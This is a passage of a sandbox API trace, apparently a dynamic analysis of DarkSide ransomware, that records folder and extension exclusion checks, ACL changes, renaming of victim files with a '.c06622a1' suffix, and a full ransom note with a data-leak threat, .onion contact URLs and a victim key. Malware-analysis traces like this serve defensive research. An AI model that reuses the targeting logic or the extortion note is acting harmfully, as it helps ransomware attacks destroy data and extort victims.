HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\Y1QH4rGO.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\vokvb4zkdkihr4rsn1\\y1qh4rgo.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\Y1QH4rGO.ods.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\vokvb4zkdkihr4rsn1\\y1qh4rgo.ods.c06622a1"), dwFlags=0x8) returned 1 [0149.446] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\VoKVB4ZKDkiHr4RSN1\\Y1QH4rGO.ods.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\vokvb4zkdkihr4rsn1\\y1qh4rgo.ods.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x658 [0149.446] CreateIoCompletionPort (FileHandle=0x658, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0149.447] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4dc0020 [0149.453] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x50fd58d5 [0149.453] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5e3e5482 [0149.453] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7d5622f2 [0149.453] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2589f6f9 [0149.453] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x61bde197 [0149.453] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x48aa3477 [0149.453] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3481844d [0149.453] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4a4fe82f [0149.456] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4dc0094, Length=0x80) returned 0x9d3530ad [0149.456] RtlComputeCrc32 (PartialCrc=0x30ad, Buffer=0x4dc0094, Length=0x80) returned 0xf4a29f7f [0149.456] RtlComputeCrc32 (PartialCrc=0x9f7f, Buffer=0x4dc0094, Length=0x80) returned 0x6eb5a65b [0149.456] RtlComputeCrc32 (PartialCrc=0xa65b, Buffer=0x4dc0094, Length=0x80) returned 0x54b528f4 [0149.456] RtlComputeCrc32 (PartialCrc=0x28f4, Buffer=0x4dc0094, Length=0x80) returned 0x4db45901 [0149.456] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4dc0020) returned 1 [0149.456] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0149.456] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0149.456] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0149.456] FindClose (in: hFindFile=0x2db87c0 | out: hFindFile=0x2db87c0) returned 1 [0149.457] _wcsicmp (_Str1="backup", _Str2="VoKVB4ZKDkiHr4RSN1") returned -20 [0149.457] wcslen (_String="backup") returned 0x6 [0149.457] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0149.457] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0149.457] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb15a1800, ftCreationTime.dwHighDateTime=0x1d5d98f, ftLastAccessTime.dwLowDateTime=0xea416a40, ftLastAccessTime.dwHighDateTime=0x1d5e652, ftLastWriteTime.dwLowDateTime=0xea416a40, ftLastWriteTime.dwHighDateTime=0x1d5e652, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="x kVsHDkjAuECPHeoW", cAlternateFileName="XKVSHD~1")) returned 1 [0149.457] _wcsicmp (_Str1="$recycle.bin", _Str2="x kVsHDkjAuECPHeoW") returned -84 [0149.457] wcslen (_String="$recycle.bin") returned 0xc [0149.457] _wcsicmp (_Str1="config.msi", _Str2="x kVsHDkjAuECPHeoW") returned -21 [0149.457] wcslen (_String="config.msi") returned 0xa [0149.457] _wcsicmp (_Str1="$windows.~bt", _Str2="x kVsHDkjAuECPHeoW") returned -84 [0149.457] wcslen (_String="$windows.~bt") returned 0xc [0149.457] _wcsicmp (_Str1="$windows.~ws", _Str2="x kVsHDkjAuECPHeoW") returned -84 [0149.457] wcslen (_String="$windows.~ws") returned 0xc [0149.457] _wcsicmp (_Str1="windows", _Str2="x kVsHDkjAuECPHeoW") returned -1 [0149.457] wcslen (_String="windows") returned 0x7 [0149.457] _wcsicmp (_Str1="appdata", _Str2="x kVsHDkjAuECPHeoW") returned -23 [0149.457] wcslen (_String="appdata") returned 0x7 [0149.457] _wcsicmp (_Str1="application data", _Str2="x kVsHDkjAuECPHeoW") returned -23 [0149.457] wcslen (_String="application data") returned 0x10 [0149.457] _wcsicmp (_Str1="boot", _Str2="x kVsHDkjAuECPHeoW") returned -22 [0149.457] wcslen (_String="boot") returned 0x4 [0149.457] _wcsicmp (_Str1="google", _Str2="x kVsHDkjAuECPHeoW") returned -17 [0149.457] wcslen (_String="google") returned 0x6 [0149.457] _wcsicmp (_Str1="mozilla", _Str2="x kVsHDkjAuECPHeoW") returned -11 [0149.458] wcslen (_String="mozilla") returned 0x7 [0149.458] _wcsicmp (_Str1="program files", _Str2="x kVsHDkjAuECPHeoW") returned -8 [0149.458] wcslen (_String="program files") returned 0xd [0149.458] _wcsicmp (_Str1="program files (x86)", _Str2="x kVsHDkjAuECPHeoW") returned -8 [0149.458] wcslen (_String="program files (x86)") returned 0x13 [0149.458] _wcsicmp (_Str1="programdata", _Str2="x kVsHDkjAuECPHeoW") returned -8 [0149.458] wcslen (_String="programdata") returned 0xb [0149.458] _wcsicmp (_Str1="system volume information", _Str2="x kVsHDkjAuECPHeoW") returned -5 [0149.458] wcslen (_String="system volume information") returned 0x19 [0149.458] _wcsicmp (_Str1="tor browser", _Str2="x kVsHDkjAuECPHeoW") returned -4 [0149.458] wcslen (_String="tor browser") returned 0xb [0149.458] _wcsicmp (_Str1="windows.old", _Str2="x kVsHDkjAuECPHeoW") returned -1 [0149.458] wcslen (_String="windows.old") returned 0xb [0149.458] _wcsicmp (_Str1="intel", _Str2="x kVsHDkjAuECPHeoW") returned -15 [0149.458] wcslen (_String="intel") returned 0x5 [0149.458] _wcsicmp (_Str1="msocache", _Str2="x kVsHDkjAuECPHeoW") returned -11 [0149.458] wcslen (_String="msocache") returned 0x8 [0149.458] _wcsicmp (_Str1="perflogs", _Str2="x kVsHDkjAuECPHeoW") returned -8 [0149.458] wcslen (_String="perflogs") returned 0x8 [0149.458] _wcsicmp (_Str1="x64dbg", _Str2="x kVsHDkjAuECPHeoW") returned 22 [0149.458] wcslen (_String="x64dbg") returned 0x6 [0149.458] _wcsicmp (_Str1="public", _Str2="x kVsHDkjAuECPHeoW") returned -8 [0149.458] wcslen (_String="public") returned 0x6 [0149.458] _wcsicmp (_Str1="all users", _Str2="x kVsHDkjAuECPHeoW") returned -23 [0149.458] wcslen (_String="all users") returned 0x9 [0149.458] _wcsicmp (_Str1="default", _Str2="x kVsHDkjAuECPHeoW") returned -20 [0149.458] wcslen (_String="default") returned 0x7 [0149.458] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\*" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\*" [0149.458] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\*") returned 0x33 [0149.459] wcscpy (in: _Dest=0x44e00e4, _Source="x kVsHDkjAuECPHeoW" | out: _Dest="x kVsHDkjAuECPHeoW") returned="x kVsHDkjAuECPHeoW" [0149.459] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0149.459] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0149.459] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW" [0149.459] GetNamedSecurityInfoW () returned 0x0 [0149.459] SetEntriesInAclW () returned 0x0 [0149.459] SetNamedSecurityInfoW () returned 0x0 [0149.464] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x2d57798) returned 1 [0149.464] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3fe5bc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0149.464] SetCurrentDirectoryW (lpPathName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow")) returned 1 [0149.464] strlen (_Str="----------- [ Welcome to DarkSide ] -------------> \r\n \r\n What happend? \r\n ---------------------------------------------- \r\n Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. \r\n But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. \r\n Follow our instructions below and you will recover all your data. \r\n \r\n Data Leak \r\n ---------------------------------------------- \r\n Dear Isolved, pay close attention to this message because it is very important. When penetrating your network, there was a global data leak from your servers. More 350Gb of DATA. Except that your network was fully encrypted. \r\n We have all the most important data from all your servers: Bases, E-mails, Accounting, Finance. If you do not get in touch within 72 hours, information about this incident will be posted on our blog, which is monitored by leading media in the U.S. and the world. \r\n \r\n Blog URL \r\n ---------------------------------------------- \r\n http://darksidedxcftmqa.onion/isolved/OLVrV9bQny0XcUSkk8y6cvFWox_2cRFUiz95xG-hYGKETYuH1rlnl2d5exhQ0jHu \r\n \r\n What guarantees? \r\n ---------------------------------------------- \r\n We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. \r\n All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. \r\n We guarantee to decrypt one file for free. Go to the site and contact us. \r\n \r\n How to get access on website? \r\n ---------------------------------------------- \r\n Using a TOR browser: \r\n 1) Download and install TOR browser from this site: https://torproject.org/ \r\n 2) Open our website: http://darksidfqzcuhtk2.onion/AZHT20L23HCABE7V5FLPMR50Y0LPCNWKLICOH3MP156YR8DTFJGUE935ZG0QYCT6 \r\n \r\n When you open our website, put the following data in the input form: \r\n Key: \r\n \r\n MDwY2fJ0wMOMksG1GCvkBclFQNBOoNOtoKM1UfDyDwuobpBZwC5VSc9Y3cd130WLEVnipGp6jBFSvhWyVQsa0J0ICcDu9ihtUQ5yYCtSPNWu0XNtNwXchonPQ0iMpRO0leoAYPOeLNbBNkz7xlWPAOBMSBKpVQn1if08n0xBOpY7xC8J9BFmbbkZutVMbLqVqGzF8Q31iGOIDpONYRDC6KQ1fZMZhHIiGXStZG8NtnZYvQQ94XKRhCuhWNfNh1SmyM0YPNMVAnslDpZLmveZmB1vNxinwAlMJj67lVkjwXQRdcRiemxRpX7gIx6zbuvkqtdYIBo1q3neaVNLyLxogP8b50tKxc0Uok1lxDfTsZ61wmNhbJiyh1FXvjgZGrvEuR2SGm5to0K6fIA8GIA8Viu2AhxUOafNcYSKXckS5hq0zYOXnITkTJFvStKKSOLzp39sYyPYmDkyIPPQUTGsoqCIti0Sb2BQFTGkQQeqvnhdTJZfzVKGobFXx0b2aWi1yYavjfLdOdVzVQJIVyeOYe610BOT4L4fRpO38eiAcwKuS1eRwskD2jP \r\n \r\n !!! DANGER !!! \r\n DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. \r\n !!! DANGER !!!") returned 0xa8f [0149.464] CreateFileW (lpFileName="README.c06622a1.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow\\readme.c06622a1.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0149.464] WriteFile (in: hFile=0x1c, lpBuffer=0x514f30*, nNumberOfBytesToWrite=0xa8f, lpNumberOfBytesWritten=0x3fe58c, lpOverlapped=0x0 | out: lpBuffer=0x514f30*, lpNumberOfBytesWritten=0x3fe58c*=0xa8f, lpOverlapped=0x0) returned 1 [0149.465] CloseHandle (hObject=0x1c) returned 1 [0149.465] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0149.465] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow")) returned 0x10 [0149.465] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\") returned="" [0149.466] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\") returned 0x45 [0149.466] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\*", fInfoLevelId=0x0, lpFindFileData=0x3fe7ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fe7ec) returned 0x2db87c0 [0149.466] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb15a1800, ftCreationTime.dwHighDateTime=0x1d5d98f, ftLastAccessTime.dwLowDateTime=0xd7b4dcc0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd7b4dcc0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.466] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69ac8ec0, ftCreationTime.dwHighDateTime=0x1d5e321, ftLastAccessTime.dwLowDateTime=0x910b6790, ftLastAccessTime.dwHighDateTime=0x1d5e73e, ftLastWriteTime.dwLowDateTime=0x910b6790, ftLastWriteTime.dwHighDateTime=0x1d5e73e, nFileSizeHigh=0x0, nFileSizeLow=0xcc93, dwReserved0=0x0, dwReserved1=0x0, cFileName="BKOJ82 W9yYD.ppt", cAlternateFileName="BKOJ82~1.PPT")) returned 1 [0149.466] _wcsicmp (_Str1="BKOJ82 W9yYD.ppt", _Str2="README.c06622a1.TXT") returned -16 [0149.466] wcsstr (_Str="BKOJ82 W9yYD.ppt", _SubStr="README") returned 0x0 [0149.466] _wcsicmp (_Str1="autorun.inf", _Str2="BKOJ82 W9yYD.ppt") returned -1 [0149.466] wcslen (_String="autorun.inf") returned 0xb [0149.466] _wcsicmp (_Str1="boot.ini", _Str2="BKOJ82 W9yYD.ppt") returned 4 [0149.466] wcslen (_String="boot.ini") returned 0x8 [0149.466] _wcsicmp (_Str1="bootfont.bin", _Str2="BKOJ82 W9yYD.ppt") returned 4 [0149.466] wcslen (_String="bootfont.bin") returned 0xc [0149.466] _wcsicmp (_Str1="bootsect.bak", _Str2="BKOJ82 W9yYD.ppt") returned 4 [0149.466] wcslen (_String="bootsect.bak") returned 0xc [0149.466] _wcsicmp (_Str1="desktop.ini", _Str2="BKOJ82 W9yYD.ppt") returned 2 [0149.466] wcslen (_String="desktop.ini") returned 0xb [0149.466] _wcsicmp (_Str1="iconcache.db", _Str2="BKOJ82 W9yYD.ppt") returned 7 [0149.466] wcslen (_String="iconcache.db") returned 0xc [0149.466] _wcsicmp (_Str1="ntldr", _Str2="BKOJ82 W9yYD.ppt") returned 12 [0149.466] wcslen (_String="ntldr") returned 0x5 [0149.466] _wcsicmp (_Str1="ntuser.dat", _Str2="BKOJ82 W9yYD.ppt") returned 12 [0149.466] wcslen (_String="ntuser.dat") returned 0xa [0149.466] _wcsicmp (_Str1="ntuser.dat.log", _Str2="BKOJ82 W9yYD.ppt") returned 12 [0149.466] wcslen (_String="ntuser.dat.log") returned 0xe [0149.466] _wcsicmp (_Str1="ntuser.ini", _Str2="BKOJ82 W9yYD.ppt") returned 12 [0149.467] wcslen (_String="ntuser.ini") returned 0xa [0149.467] _wcsicmp (_Str1="thumbs.db", _Str2="BKOJ82 W9yYD.ppt") returned 18 [0149.467] wcslen (_String="thumbs.db") returned 0x9 [0149.467] _wcsicmp (_Str1="386", _Str2="ppt") returned -61 [0149.467] wcslen (_String="386") returned 0x3 [0149.467] _wcsicmp (_Str1="adv", _Str2="ppt") returned -15 [0149.467] wcslen (_String="adv") returned 0x3 [0149.467] _wcsicmp (_Str1="ani", _Str2="ppt") returned -15 [0149.467] wcslen (_String="ani") returned 0x3 [0149.467] _wcsicmp (_Str1="bat", _Str2="ppt") returned -14 [0149.467] wcslen (_String="bat") returned 0x3 [0149.467] _wcsicmp (_Str1="bin", _Str2="ppt") returned -14 [0149.467] wcslen (_String="bin") returned 0x3 [0149.467] _wcsicmp (_Str1="cab", _Str2="ppt") returned -13 [0149.467] wcslen (_String="cab") returned 0x3 [0149.467] _wcsicmp (_Str1="cmd", _Str2="ppt") returned -13 [0149.467] wcslen (_String="cmd") returned 0x3 [0149.467] _wcsicmp (_Str1="com", _Str2="ppt") returned -13 [0149.467] wcslen (_String="com") returned 0x3 [0149.467] _wcsicmp (_Str1="cpl", _Str2="ppt") returned -13 [0149.467] wcslen (_String="cpl") returned 0x3 [0149.467] _wcsicmp (_Str1="cur", _Str2="ppt") returned -13 [0149.467] wcslen (_String="cur") returned 0x3 [0149.467] _wcsicmp (_Str1="deskthemepack", _Str2="ppt") returned -12 [0149.467] wcslen (_String="deskthemepack") returned 0xd [0149.467] _wcsicmp (_Str1="diagcab", _Str2="ppt") returned -12 [0149.467] wcslen (_String="diagcab") returned 0x7 [0149.467] _wcsicmp (_Str1="diagcfg", _Str2="ppt") returned -12 [0149.467] wcslen (_String="diagcfg") returned 0x7 [0149.468] _wcsicmp (_Str1="diagpkg", _Str2="ppt") returned -12 [0149.468] wcslen (_String="diagpkg") returned 0x7 [0149.468] _wcsicmp (_Str1="dll", _Str2="ppt") returned -12 [0149.468] wcslen (_String="dll") returned 0x3 [0149.468] _wcsicmp (_Str1="drv", _Str2="ppt") returned -12 [0149.468] wcslen (_String="drv") returned 0x3 [0149.468] _wcsicmp (_Str1="exe", _Str2="ppt") returned -11 [0149.468] wcslen (_String="exe") returned 0x3 [0149.468] _wcsicmp (_Str1="hlp", _Str2="ppt") returned -8 [0149.468] wcslen (_String="hlp") returned 0x3 [0149.468] _wcsicmp (_Str1="icl", _Str2="ppt") returned -7 [0149.468] wcslen (_String="icl") returned 0x3 [0149.468] _wcsicmp (_Str1="icns", _Str2="ppt") returned -7 [0149.468] wcslen (_String="icns") returned 0x4 [0149.468] _wcsicmp (_Str1="ico", _Str2="ppt") returned -7 [0149.468] wcslen (_String="ico") returned 0x3 [0149.468] _wcsicmp (_Str1="ics", _Str2="ppt") returned -7 [0149.468] wcslen (_String="ics") returned 0x3 [0149.468] _wcsicmp (_Str1="idx", _Str2="ppt") returned -7 [0149.468] wcslen (_String="idx") returned 0x3 [0149.468] _wcsicmp (_Str1="ldf", _Str2="ppt") returned -4 [0149.468] wcslen (_String="ldf") returned 0x3 [0149.468] _wcsicmp (_Str1="lnk", _Str2="ppt") returned -4 [0149.468] wcslen (_String="lnk") returned 0x3 [0149.468] _wcsicmp (_Str1="mod", _Str2="ppt") returned -3 [0149.468] wcslen (_String="mod") returned 0x3 [0149.468] _wcsicmp (_Str1="mpa", _Str2="ppt") returned -3 [0149.468] wcslen (_String="mpa") returned 0x3 [0149.469] _wcsicmp (_Str1="msc", _Str2="ppt") returned -3 [0149.469] wcslen (_String="msc") returned 0x3 [0149.469] _wcsicmp (_Str1="msp", _Str2="ppt") returned -3 [0149.469] wcslen (_String="msp") returned 0x3 [0149.469] _wcsicmp (_Str1="msstyles", _Str2="ppt") returned -3 [0149.469] wcslen (_String="msstyles") returned 0x8 [0149.469] _wcsicmp (_Str1="msu", _Str2="ppt") returned -3 [0149.469] wcslen (_String="msu") returned 0x3 [0149.469] _wcsicmp (_Str1="nls", _Str2="ppt") returned -2 [0149.469] wcslen (_String="nls") returned 0x3 [0149.469] _wcsicmp (_Str1="nomedia", _Str2="ppt") returned -2 [0149.469] wcslen (_String="nomedia") returned 0x7 [0149.469] _wcsicmp (_Str1="ocx", _Str2="ppt") returned -1 [0149.469] wcslen (_String="ocx") returned 0x3 [0149.469] _wcsicmp (_Str1="prf", _Str2="ppt") returned 2 [0149.469] wcslen (_String="prf") returned 0x3 [0149.469] _wcsicmp (_Str1="ps1", _Str2="ppt") returned 3 [0149.469] wcslen (_String="ps1") returned 0x3 [0149.469] _wcsicmp (_Str1="rom", _Str2="ppt") returned 2 [0149.469] wcslen (_String="rom") returned 0x3 [0149.469] _wcsicmp (_Str1="rtp", _Str2="ppt") returned 2 [0149.469] wcslen (_String="rtp") returned 0x3 [0149.469] _wcsicmp (_Str1="scr", _Str2="ppt") returned 3 [0149.469] wcslen (_String="scr") returned 0x3 [0149.469] _wcsicmp (_Str1="shs", _Str2="ppt") returned 3 [0149.469] wcslen (_String="shs") returned 0x3 [0149.469] _wcsicmp (_Str1="spl", _Str2="ppt") returned 3 [0149.469] wcslen (_String="spl") returned 0x3 [0149.469] _wcsicmp (_Str1="sys", _Str2="ppt") returned 3 [0149.469] wcslen (_String="sys") returned 0x3 [0149.470] _wcsicmp (_Str1="theme", _Str2="ppt") returned 4 [0149.470] wcslen (_String="theme") returned 0x5 [0149.470] _wcsicmp (_Str1="themepack", _Str2="ppt") returned 4 [0149.470] wcslen (_String="themepack") returned 0x9 [0149.470] _wcsicmp (_Str1="wpx", _Str2="ppt") returned 7 [0149.470] wcslen (_String="wpx") returned 0x3 [0149.470] _wcsicmp (_Str1="lock", _Str2="ppt") returned -4 [0149.470] wcslen (_String="lock") returned 0x4 [0149.470] _wcsicmp (_Str1="key", _Str2="ppt") returned -5 [0149.470] wcslen (_String="key") returned 0x3 [0149.470] _wcsicmp (_Str1="hta", _Str2="ppt") returned -8 [0149.470] wcslen (_String="hta") returned 0x3 [0149.470] _wcsicmp (_Str1="msi", _Str2="ppt") returned -3 [0149.470] wcslen (_String="msi") returned 0x3 [0149.470] _wcsicmp (_Str1="pdb", _Str2="ppt") returned -12 [0149.470] wcslen (_String="pdb") returned 0x3 [0149.470] _wcsicmp (_Str1="sql", _Str2="ppt") returned 3 [0149.470] wcslen (_String="sql") returned 0x3 [0149.470] _wcsicmp (_Str1="sqlite", _Str2="ppt") returned 3 [0149.470] wcslen (_String="sqlite") returned 0x6 [0149.470] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow")) returned 0x10 [0149.470] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0149.470] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW" [0149.470] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW") returned 0x44 [0149.470] wcscpy (in: _Dest=0x4530132, _Source="BKOJ82 W9yYD.ppt" | out: _Dest="BKOJ82 W9yYD.ppt") returned="BKOJ82 W9yYD.ppt" [0149.470] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\BKOJ82 W9yYD.ppt", dwFileAttributes=0x80) returned 1 [0149.471] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\BKOJ82 W9yYD.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow\\bkoj82 w9yyd.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0149.471] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.471] ReadFile (in: hFile=0x63c, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0149.472] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0xee5d28bd [0149.472] RtlComputeCrc32 (PartialCrc=0x28bd, Buffer=0x3fe674, Length=0x80) returned 0x5414adc1 [0149.472] RtlComputeCrc32 (PartialCrc=0xadc1, Buffer=0x3fe674, Length=0x80) returned 0x29b6a0a2 [0149.472] RtlComputeCrc32 (PartialCrc=0xa0a2, Buffer=0x3fe674, Length=0x80) returned 0x39a08e4 [0149.472] RtlComputeCrc32 (PartialCrc=0x8e4, Buffer=0x3fe674, Length=0x80) returned 0x60deab98 [0149.472] CloseHandle (hObject=0x63c) returned 1 [0149.472] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0149.472] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\BKOJ82 W9yYD.ppt" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\BKOJ82 W9yYD.ppt") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\BKOJ82 W9yYD.ppt" [0149.472] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\BKOJ82 W9yYD.ppt") returned 0x55 [0149.472] wcscpy (in: _Dest=0x454015a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0149.472] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\BKOJ82 W9yYD.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ohjal\\x kvshdkjauecpheow\\bkoj82 w9yyd.ppt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oHjAL\\x kVsHDkjAuECPHeoW\\BKOJ82 W9yYD.ppt.c06622a1" (normalized: 